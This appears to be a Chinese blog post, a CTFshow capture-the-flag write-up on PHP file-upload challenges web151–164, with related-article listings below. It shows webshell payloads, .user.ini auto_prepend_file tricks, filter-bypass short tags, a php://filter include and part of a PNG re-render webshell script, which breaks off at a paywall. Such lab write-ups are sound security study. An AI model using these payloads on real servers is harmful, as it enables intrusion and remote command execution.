[CTFSHOW]文件上传

最新推荐文章于 2024-05-11 19:14:19 发布
最新推荐文章于 2024-05-11 19:14:19 发布
阅读量256 收藏
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/114994671
版权

web 151

看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码
在这里插入图片描述

web 152

和上题一样的解法

web 153

和上面一样的解法直接改后缀就没用了
在这里插入图片描述
测试了一下,发现是黑名单的过滤
在这里插入图片描述
所以就上传.htaccess文件把png文件解析成php
在这里插入图片描述
但是很遗憾,用不了
在这里插入图片描述
引用一波羽大佬的wp:

本题考点为.user.ini,详细配置可以参考官方文档
如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以

找到这两个auto_append_fileauto_prepend_file,作用:
一个相当于在每个php文件尾加上 include(“xxxx”)
一个相当于文件头加上 include(“xxx”)
其中xxx就是 auto_append_file的值。

现在回到这个题。为了利用auto_append_file,我们首先上传一个带木马的图片,接着上传.user.ini内容为 auto_append_file=“xxx” xxx为我们上传的文件名。
这样就在每个php文件上包含了我们的木马文件。

在这里插入图片描述

在这里插入图片描述
因为upload有index.php,所以这个php就会添加一个include(“1.png”),就会包含到木马

然后开蚁剑连到upload就可以了

web 154

传的时候改后缀和content-type不行了,会识别内容
在这里插入图片描述
用script也不行,估计是把php给ban了,所以就用php短标签,直接传system命令
先传.user.ini
在这里插入图片描述
再传一个system命令

<?=system("tac ../f*")?>

在这里插入图片描述

访问/upload就得到了flag

web 155、156

做法同上
155还可以传post[],166不行了

web 157

ban了分号;
只用一个system不加分号也可以

<?=system("cat ../flag*")

web 158

过滤了括号,用反引号直接指向命令
在这里插入图片描述

web 159

  • php伪协议配合文件包含与.user.ini的利用

先传了一个.user.ini

auto_prepend_file=shell.png

再传图片上去,内容是
由于php被过滤,这里就用.号来绕过,在利用php伪协议进行文件的读取

<?= include"ph"."p://filter/read=convert.base64-encode/resource=../flag.ph"."p"?>

在这里插入图片描述
访问/upload/index.php,成功得到flag
在这里插入图片描述

web 160

在上一题的基础上过滤了空格,把空格换成tab就可以绕过(其实也用不上空格)
在这里插入图片描述

web 161-163

不知道为啥什么东西都传不上了,正常图片也传不上,就先放着了

web 164

  • 考察图片马二次渲染

这里是png的二次渲染
脚本:

<?php

/*<?$_GET[0]($_POST[1]);?>*/

$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
最低0.47元/天 解锁文章
huamanggg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow---文件上传
fainpo的博客
04-10 568
来到文件上传了。
ctfshow——文件上传
qq_55202378的博客
12-27 1248
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
2024年网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1),网络安全事件分发机制及设计思路
最新发布
2401_84264727的博客
05-11 972
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。要修改的图片的路径,1.png是使用的文件,可以不存在。
2024年最全CTFshow web入门——文件上传_ctfshow文件上传,给大家安排上
2401_84520377的博客
05-05 894
上传一个图片木马,发现上传不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上传,bp抓包。
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1046
CTFshow-文件上传
文件上传ctfshow,upload-labs,文件上传字典生成)
qq_47168481的博客
11-17 3543
准备了10几天的美亚杯,最后结果也是很满意的,拿到了一等奖,不过还是得继续学习web,冲冲冲!(全部复现有点麻烦,有的图借用了其他大佬的) web151-web152 本题即绕过前端验证,只需上传一个png图片(图片马,普通图片需添加一句话),在burp截断时修改content-type为php即可绕过,再进入文件目录,利用命令执行得到flag 制作图片马的方法: 用一张小点的图片和一句话木马,利用copy命令生成图片马 copy 1.png/b+2.php/a 3.png web153-web160
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
CTFshow 文件上传 web163
Kradress的博客
02-16 608
目录源码思路总结 源码 思路 先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5483
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
CTFSHOW 文件上传(学习记录)
ximo的博客
02-16 577
目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证,抓包修改数据OK Web 152 直接上传一句话木马,连接即可 Web 153 参考链接: 文件上传漏洞——.htaccess和.user.ini配置文件的应用 因为该环境是nginx搭建的,所以.h
ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 1959
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5450
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
CTFSHOW文件上传(可能也是持续更新)
Npceer-一位网安初学者的博客
02-14 260
文件上传0x01 web 151 0x01 web 151 按照hint去试了下 写一句话 然后改png 上传 抓包把后缀改成php 然后就上传成功了 然后 我太菜了 不会玩 还想用菜刀呢 然后报错了 仔细看原因 接着访问url/upload/**.php(你自己写进去的文件名字) 我用的hackbar 从羽大佬博客学了一下 因为我自己用system+cat不知道为啥半天弄不出 ...
[JMCTF 2021]UploadHub
D.MIND 的博客
05-19 1896
主要看apache2.conf配置文件: <Directory ~ "/var/www/html/upload/[a-f0-9]{32}/"> php_flag engine off </Directory> php_flag engine off是会使整个目录不解析php的,所以上传php文件是行不通的 这题主要在配置上给我们限制了很多,而.htaccess就是可以修改配置的一个文件,恰好此题是可以上传.htaccess的(此题似乎并不做上传限制) 方法一 .ht
CTFshow 文件上传 web157
Kradress的博客
02-15 504
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 在上传shell.png的时候,对比上题,;和反引号也不能用了,过滤;可以用闭合php标签用?>来绕过 shell.png <?system('tac ../f*')?> 访问/upload,拿到flag 总结 … ...
ctfshow文件上传
09-02
您好!对于CTF Show文件上传的问题,我可以给您一些基本的指导。 在CTF(Capture The Flag)比赛中,文件上传通常是一个常见的题目类型。这类题目要求参赛选手利用漏洞或者绕过限制,成功将文件上传到目标服务器上。 常见的文件上传漏洞包括但不限于以下几种: 1. 后缀绕过:目标服务器对上传文件的后缀进行了限制,但未对文件内容进行验证。您可以尝试修改文件后缀名,或者在上传时使用一些特殊的字符来绕过后缀检测。 2. MIME类型绕过:目标服务器对上传文件的MIME类型进行了检测,但未对文件内容进行验证。您可以尝试修改文件的Content-Type头部信息,或者在上传时使用一些特殊的字符来绕过MIME类型检测。 3. 目录穿越:目标服务器未对文件路径进行合理的校验,您可以尝试通过上传包含特殊字符(如'../')的文件名来实现目录穿越,达到上传文件到其他目录的目的。 4. 文件包含漏洞:目标服务器存在文件包含漏洞时,您可以通过上传一个恶意文件,然后在适当的条件下触发该文件被包含,从而执行您所需要的操作。 需要注意的是,在实际的CTF比赛或者演练中,上传文件是一个涉及安全性的操作,务必遵循规则和道德准则,避免对他人系统造成不必要的损害。 希望这些信息对您有所帮助!如果您有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值